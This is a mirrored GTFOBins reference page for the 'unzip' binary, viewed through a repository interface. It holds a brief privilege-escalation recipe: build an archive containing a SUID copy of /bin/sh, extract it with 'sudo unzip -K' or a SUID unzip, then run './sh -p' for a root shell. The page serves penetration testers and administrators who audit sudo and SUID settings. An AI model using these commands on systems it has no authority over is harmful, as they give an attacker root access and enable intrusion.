GTFOBins.github.io

mirror of https://github.com/daffainfo/GTFOBins.github.io.git

460 B

Raw Permalink Blame History

description

functions

Certain `unzip` versions allows to preserve the SUID bit. Prepare an archive beforehand with the following commands as root: ``` cp /bin/sh . chmod +s sh zip shell.zip sh ``` Extract it on the target, then run the SUID shell as usual (omitting the `-p` where appropriate).

sudo

suid

code
sudo unzip -K shell.zip ./sh -p

code
./unzip -K shell.zip ./sh -p

460 B Raw Permalink Blame History

460 B

Raw Permalink Blame History